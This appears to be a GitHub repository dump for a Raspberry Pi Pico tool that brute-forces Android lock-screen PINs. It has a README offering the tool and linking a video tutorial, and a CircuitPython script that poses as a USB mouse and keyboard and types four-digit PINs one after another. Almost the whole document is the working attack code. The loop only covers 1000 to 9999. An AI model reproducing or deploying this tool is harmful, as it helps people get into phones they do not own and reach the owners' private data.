├── flash_nuke.uf2 ├── README.md └── code.py /flash_nuke.uf2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EnriqueStrange/androidpinbruteforcepico/HEAD/flash_nuke.uf2 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # androidpinbruteforcepico 2 | This program can be taken in use to brute force android security pin with raspberry pi pico installed with adafruit_circuitpython_hid and circuit python module more details on youtube channel - STRANGE LEARNINGS 3 | The file named flask_nuke.uf2 is used to a cleanboot on your raspberry pi pico. for more reffer : https://learn.adafruit.com/getting-started-with-raspberry-pi-pico-circuitpython/circuitpython 4 | 5 | 6 | 7 | video tutorial - https://youtu.be/CtaQTDfTqxA 8 | -------------------------------------------------------------------------------- /code.py: -------------------------------------------------------------------------------- 1 | import time 2 | import usb_hid 3 | from adafruit_hid.mouse import Mouse 4 | from adafruit_hid.keyboard import Keyboard 5 | from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS 6 | from adafruit_hid.keycode import Keycode 7 | import board 8 | import digitalio 9 | import random 10 | 11 | mouse = Mouse(usb_hid.devices) 12 | time.sleep(2) 13 | led = digitalio.DigitalInOut(board.GP25) 14 | led.direction = digitalio.Direction.OUTPUT 15 | keyboard = Keyboard(usb_hid.devices) 16 | keyboard_layout = KeyboardLayoutUS(keyboard) 17 | 18 | led.value = False 19 | mouse.move(y=800) 20 | 21 | click = 1 22 | while click < 2: 23 | led.value=True 24 | mouse.click(Mouse.LEFT_BUTTON) 25 | time.sleep(0.5) 26 | i = 1000 27 | while i <= 9999: 28 | key = i 29 | pin =str(key) 30 | keyboard_layout.write(pin) 31 | time.sleep(1.5) 32 | i += 1 33 | click = click+1 34 | 35 | led.value=False 36 | --------------------------------------------------------------------------------